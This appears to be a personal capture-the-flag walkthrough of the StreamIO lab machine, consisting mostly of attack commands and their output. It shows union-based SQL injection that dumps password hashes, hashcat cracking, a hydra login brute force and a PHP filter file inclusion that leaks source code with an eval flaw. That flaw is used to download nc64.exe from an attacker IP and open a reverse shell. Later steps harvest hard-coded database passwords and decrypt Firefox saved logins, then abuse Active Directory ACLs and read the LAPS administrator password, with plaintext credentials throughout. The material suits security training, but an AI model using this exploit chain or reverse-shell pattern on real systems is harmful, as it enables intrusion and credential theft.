📽️

StreamIO

 
53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49732,57840
10.10.11.158 watch.streamIO.htb streamIO.htb dc.streamIO.htb
 
https://watch.streamio.htb/ http://streamio.htb
 
gobuster dir -u https://watch.streamio.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x php
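Try SQL injection in the search field.
The original SQL query presumably ends with like '%<input>%', i.e. the search term is concatenated into the statement instead of being bound as a parameter.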
try search ha' --
haha' union select 1,2,3,4,5;--
haha' union select 1,2,3,4,5,6;--
haha' union select 1,@version,3,4,5,6;-- - Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0 (Build 17763: ) (Hypervisor)
It’s MSSQL
cheatsheet:
 
haha' union select 1,name,3,4,5,6 from master..sysdatabases;-- -
haha' union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U';--
haha' union select 1,name,id,4,5,6 FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users'); --
haha' union select 1,concat(username,':',password),2,4,5,6 FROM users; --
admin:665a50ac9eaa781e4f7f04199db97a11 Alexendra:1c2b3d8270321140e5153f6637d3ee53 Austin:0049ac57646627b8d7aeaccf8b6a936f Barbra:3961548825e3e21df5646cafe11c6c76 Barry:54c88b2dbd7b1a84012fabc1a4c73415 Baxter:22ee218331afd081b0dcd8115284bae3 Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8 Carmon:35394484d89fcfdb3c5e447fe749d213 Clara:ef8f3d30a856cf166fb8215aca93e9ff Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5 Garfield:8097cedd612cc37c29db152b6e9edbd3 Gloria:0cfaaaafb559f081df2befbe66686de0 James:c660060492d9edcaa8332d89c99c9239 Juliette:6dcd87740abb64edfa36d170f0d5450d Lauren:08344b85b329d7efd611b7a7743e8a09 Lenord:ee0b8a0937abd60c2882eacb2f8dc49f Lucifer:7df45a9e3de3863807c026ba48e55fb3 Michelle:b83439b16f844bd6ffe35c02fe21b3c0 Oliver:fd78db29173a5cf701bd69027cb9bf6b Robert:f03b910e2bd0313a23fdd7575f34a694 Robin:dc332fb5576e9631c9dae83f194f8e70 Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5 Samantha:083ffae904143c4796e464dac33c1f7d Stan:384463526d288edcc95fc3701e523bc7 Thane:3577c47eb1e12c8ba021611e1280753c Theodore:925e5408ecb67aea449373d668b7359e Victor:bf55e15b119860a6e6b5a164377da719 Victoria:b22abb47a02b52d5dfa27fb0b534f693 William:d62be0dc82071bccc1322d64ec5b6c51 yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
hashcat -m 0 creds.txt /usr/share/wordlists/rockyou.txt --user
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$ Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123 Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$ Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8! yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
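Save the cracked entries to the file creds. Mode 0 is raw MD5: the application stores unsalted MD5 password hashes, which is why a plain wordlist recovers so many of them.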
cat creds | awk -F ':' '{print $1}' >> username.txt
cat creds | awk -F ':' '{print $3}' > password.txt
Trying these credentials against SMB failed.
cat creds | cut -d: -f 1,3 | tee pass
hydra -C pass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"
https://streamio.htb/admin/
gobuster dir -u https://streamio.htb/admin/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
To enumerate parameter names
wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Cookie:PHPSESSID=bkudr03jnlhe8h5mutnomjfm6a" --hh 1678
https://streamio.htb/admin/?debug=
 
 
Try file inclusion via the parameter found above:
php://filter/convert.base64-encode/resource=master.php
The response contains the base64-encoded source:
onlyPGgxPk1vdmllIG1hbmFnbWVudDwvaDE+DQo8P3BocA0KaWYoIWRlZmluZWQoJ2luY2x1ZGVkJykpDQoJZGllKCJPbmx5IGFjY2Vzc2FibGUgdGhyb3VnaCBpbmNsdWRlcyIpOw0KaWYoaXNzZXQoJF9QT1NUWydtb3ZpZV9pZCddKSkNCnsNCiRxdWVyeSA9ICJkZWxldGUgZnJvbSBtb3ZpZXMgd2hlcmUgaWQgPSAiLiRfUE9TVFsnbW92aWVfaWQnXTsNCiRyZXMgPSBzcWxzcnZfcXVlcnkoJGhhbmRsZSwgJHF1ZXJ5LCBhcnJheSgpLCBhcnJheSgiU2Nyb2xsYWJsZSI9PiJidWZmZXJlZCIpKTsNCn0NCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIG1vdmllcyBvcmRlciBieSBtb3ZpZSI7DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp3aGlsZSgkcm93ID0gc3Fsc3J2X2ZldGNoX2FycmF5KCRyZXMsIFNRTFNSVl9GRVRDSF9BU1NPQykpDQp7DQo/Pg0KDQo8ZGl2Pg0KCTxkaXYgY2xhc3M9ImZvcm0tY29udHJvbCIgc3R5bGU9ImhlaWdodDogM3JlbTsiPg0KCQk8aDQgc3R5bGU9ImZsb2F0OmxlZnQ7Ij48P3BocCBlY2hvICRyb3dbJ21vdmllJ107ID8+PC9oND4NCgkJPGRpdiBzdHlsZT0iZmxvYXQ6cmlnaHQ7cGFkZGluZy1yaWdodDogMjVweDsiPg0KCQkJPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Ij9tb3ZpZT0iPg0KCQkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im1vdmllX2lkIiB2YWx1ZT0iPD9waHAgZWNobyAkcm93WydpZCddOyA/PiI+DQoJCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tc20gYnRuLXByaW1hcnkiIHZhbHVlPSJEZWxldGUiPg0KCQkJPC9mb3JtPg0KCQk8L2Rpdj4NCgk8L2Rpdj4NCjwvZGl2Pg0KPD9waHANCn0gIyB3aGlsZSBlbmQNCj8+DQo8YnI+PGhyPjxicj4NCjxoMT5TdGFmZiBtYW5hZ21lbnQ8L2gxPg0KPD9waHANCmlmKCFkZWZpbmVkKCdpbmNsdWRlZCcpKQ0KCWRpZSgiT25seSBhY2Nlc3NhYmxlIHRocm91Z2ggaW5jbHVkZXMiKTsNCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIHVzZXJzIHdoZXJlIGlzX3N0YWZmID0gMSAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0KaWYoaXNzZXQoJF9QT1NUWydzdGFmZl9pZCddKSkNCnsNCj8+DQo8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1zdWNjZXNzIj4gTWVzc2FnZSBzZW50IHRvIGFkbWluaXN0cmF0b3I8L2Rpdj4NCjw/cGhwDQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDEiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNz
PSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ic3RhZmZfaWQiIHZhbHVlPSI8P3BocCBlY2hvICRyb3dbJ2lkJ107ID8+Ij4NCgkJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnRuIGJ0bi1zbSBidG4tcHJpbWFyeSIgdmFsdWU9IkRlbGV0ZSI+DQoJCQk8L2Zvcm0+DQoJCTwvZGl2Pg0KCTwvZGl2Pg0KPC9kaXY+DQo8P3BocA0KfSAjIHdoaWxlIGVuZA0KPz4NCjxicj48aHI+PGJyPg0KPGgxPlVzZXIgbWFuYWdtZW50PC9oMT4NCjw/cGhwDQppZighZGVmaW5lZCgnaW5jbHVkZWQnKSkNCglkaWUoIk9ubHkgYWNjZXNzYWJsZSB0aHJvdWdoIGluY2x1ZGVzIik7DQppZihpc3NldCgkX1BPU1RbJ3VzZXJfaWQnXSkpDQp7DQokcXVlcnkgPSAiZGVsZXRlIGZyb20gdXNlcnMgd2hlcmUgaXNfc3RhZmYgPSAwIGFuZCBpZCA9ICIuJF9QT1NUWyd1c2VyX2lkJ107DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlcl9pZCIgdmFsdWU9Ijw/cGhwIGVjaG8gJHJvd1snaWQnXTsgPz4iPg0KCQkJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLXNtIGJ0bi1wcmltYXJ5IiB2YWx1ZT0iRGVsZXRlIj4NCgkJCTwvZm9ybT4NCgkJPC9kaXY+DQoJPC9kaXY+DQo8L2Rpdj4NCjw/cGhwDQp9ICMgd2hpbGUgZW5kDQo/Pg0KPGJyPjxocj48YnI+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiPg0KPGlucHV0IG5hbWU9ImluY2x1ZGUiIGhpZGRlbj4NCjwvZm9ybT4NCjw/cGhwDQppZihpc3NldCgkX1BPU1RbJ2luY2x1ZGUnXSkpDQp7DQppZigkX1BPU1RbJ2luY2x1ZGUnXSAhPT0gImluZGV4LnBocCIgKSANCmV2YWwoZmlsZV9nZXRfY29udGVudHMoJF9Q
T1NUWydpbmNsdWRlJ10pKTsNCmVsc2UNCmVjaG8oIiAtLS0tIEVSUk9SIC0tLS0gIik7DQp9DQo/Pg==
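Decoded source of master.php (the leading "only" on the base64 line is not part of the encoded data; decoding it together with the payload yields three stray bytes before <h1>):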
<h1>Movie managment</h1>
<?php
# Admin panel fragment with three sections (movies, staff, users) followed by
# a hidden "include" handler at the bottom of the file.
# Guard: stop unless the including script has defined the constant 'included'.
if(!defined('included'))
    die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
    # NOTE(review): movie_id from the POST body is concatenated directly into
    # the DELETE statement, and the params array passed to sqlsrv_query() is
    # empty, so nothing is bound. Bind the id as a query parameter instead.
    $query = "delete from movies where id = ".$_POST['movie_id'];
    $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
# List every movie; each row is rendered with its own delete form.
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
# NOTE(review): row values are echoed into the HTML below without encoding.
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
    <div class="form-control" style="height: 3rem;">
        <h4 style="float:left;"><?php echo $row['movie']; ?></h4>
        <div style="float:right;padding-right: 25px;">
            <form method="POST" action="?movie=">
                <input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
                <input type="submit" class="btn btn-sm btn-primary" value="Delete">
            </form>
        </div>
    </div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
    die("Only accessable through includes");
# This first result set is overwritten below before it is read.
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
# staff_id is only tested for presence: no query in this section uses it, the
# page just prints a confirmation banner.
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
    <div class="form-control" style="height: 3rem;">
        <h4 style="float:left;"><?php echo $row['username']; ?></h4>
        <div style="float:right;padding-right: 25px;">
            <form method="POST">
                <input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
                <input type="submit" class="btn btn-sm btn-primary" value="Delete">
            </form>
        </div>
    </div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
    die("Only accessable through includes");
if(isset($_POST['user_id']))
{
    # NOTE(review): same pattern as the movie delete above: user_id is
    # concatenated into the statement and no parameter is bound.
    $query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
    $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
<div>
    <div class="form-control" style="height: 3rem;">
        <h4 style="float:left;"><?php echo $row['username']; ?></h4>
        <div style="float:right;padding-right: 25px;">
            <form method="POST">
                <input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
                <input type="submit" class="btn btn-sm btn-primary" value="Delete">
            </form>
        </div>
    </div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
    <input name="include" hidden>
</form>
<?php
# NOTE(review): this is the critical flaw in the file. The only check on the
# POSTed "include" value is that it is not exactly "index.php"; anything else
# that file_get_contents() can read is fetched and handed to eval(), so the
# requester chooses the code that runs. Remove this handler, or resolve the
# value against a fixed allow-list of local files and never eval() it.
if(isset($_POST['include']))
{
    if($_POST['include'] !== "index.php" )
        eval(file_get_contents($_POST['include']));
    else
        echo(" ---- ERROR ---- ");
}
?>
 
 
system("powershell -c wget http://10.10.16.6/nc64.exe -outfile \\programdata\\nc64.exe"); system("\\programdata\\nc64.exe -e powershell 10.10.16.6 443");
 
curl -X POST 'https://streamio.htb/admin/?debug=master.php' -k -b 'PHPSESSID=bkudr03jnlhe8h5mutnomjfm6a' -d 'include=http://10.10.16.6/shell.php'
 
Got a foothold.
PS C:\inetpub\streamio.htb\admin> whoami │ whoami │ streamio\yoshihide
Look at search.php in the watch.streamio.htb site directory; it contains a hard-coded database connection string:
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
 
Search the PHP files on the Windows host for other hard-coded database credentials:
dir -recurse *.php | select-string -pattern "database"
admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890'); login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h'); register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
db_admin:B1@hx31234567890 db_user:B1@hB1@hB1@h
PS C:\inetpub\streamio.htb> where.exe sqlcmd where.exe sqlcmd C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select name from sys.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
cat userpass |awk -F ' ' '{print $2":"$3}' | tee userpass
then try hashcat
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls.. Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
 
try creds of nikk37
evil-winrm -u nikk37 -p get_dem_girls2@yahoo.com -i 10.10.11.158
get the first flag.
 
 
found by winPEAS
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B\active-update.xml: "c801bf41e708ce0b1fea7cba12bc01c9a5b138e9b97aa893dabd40a4b16c41e7c9af01069136cd2282dabba352304f722e6ee0555b6e117ab003d9000435df92" C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B\active-update.xml: "57b73de48c7802f9a175e18da56d424844745201853b43da8c1d55cab43a45dfc72b78c08e833235da1564c2ffe15509852900113a17dc49ca688de659e5e141"
C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles
 
Download the JSON files from that profile folder.
 
To decrypt them, search Google for a suitable tool.
 
git clone https://github.com/lclevy/firepwd.git
{"nextId":5,"logins":[{"id":1,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECG2cZGM1+s+hBAiQvduUzZPkCw==","encryptedPassword":"MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECKA5q3v2TxvuBBjtXIyW2UjOBvrg700JOU1yfrb0EnMRelw=","guid":"{9867a888-c468-4173-b2f4-329a1ec7fa60}","encType":1,"timeCreated":1645526456872,"timeLastUsed":1645526456872,"timePasswordChanged":1645526456872,"timesUsed":1},{"id":2,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDMUru7zbEb0BAiinvqXr8Trkg==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECOXW0KzZftfWBBARYsMPvSrUwx8+QfJdxzT+","guid":"{739bd2a5-5fec-4e08-97d2-3c619bf02be2}","encType":1,"timeCreated":1645526470377,"timeLastUsed":1645526470377,"timePasswordChanged":1645526470377,"timesUsed":1},{"id":3,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECPtpFUOBoOFABBDVCjdAdstUxzB6i9DCqvOw","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCocciyfDsthBBDm3YSuhBsW3roo3l3zOUuF","guid":"{a98a87bc-86aa-489c-9227-d6579ab5148b}","encType":1,"timeCreated":1645526484137,"timeLastUsed":1645526484137,"timePasswordChanged":1645526484137,"timesUsed":1},{"id":4,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECB1j+gQdXzIuBAgO0o/N3J2MrQ==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNt9zddW+/h7BBCBgoQVGaDQjF2IpeQEl/Td","guid":"{2be21548-7c50-42f0-8ef6-b33b1e77f150}","encType":1,"timeCreated":1645526511842,"timeLastUsed":1645526511842,"timePasswordChanged":1645526511842,"timesUsed":1}],"pote
ntiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}
python3 firepwd.py -d firefox
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r' https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)' https://slack.streamio.htb:b'yoshihide',b'paddpadd@12' https://slack.streamio.htb:b'JDgodd',b'password@12'
Try these credentials against SMB and WinRM.
crackmapexec smb 10.10.11.158 -u firefoxname -p firefoxpass --continue-on-success
JDgodd:JDg0dd1s@d0p3cr3@t0r
Use BloodHound to collect information about the AD domain.
bloodhound-python --dns-tcp -ns 10.10.11.158 -c All -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb -dc streamio.htb --zip
$pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)
Load powerview.ps1 first, then:
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Identity 'Core Staff' -Members 'StreamIO\JDgodd' -Credential $Cred
Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd -Credential $cred
Nothing was returned; try crackmapexec instead.
crackmapexec smb streamio.htb -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds
administrator:Hr#3aMyX+A3+p8
evil-winrm -u administrator -p 'Hr#3aMyX+A3+p8' -i 10.10.11.158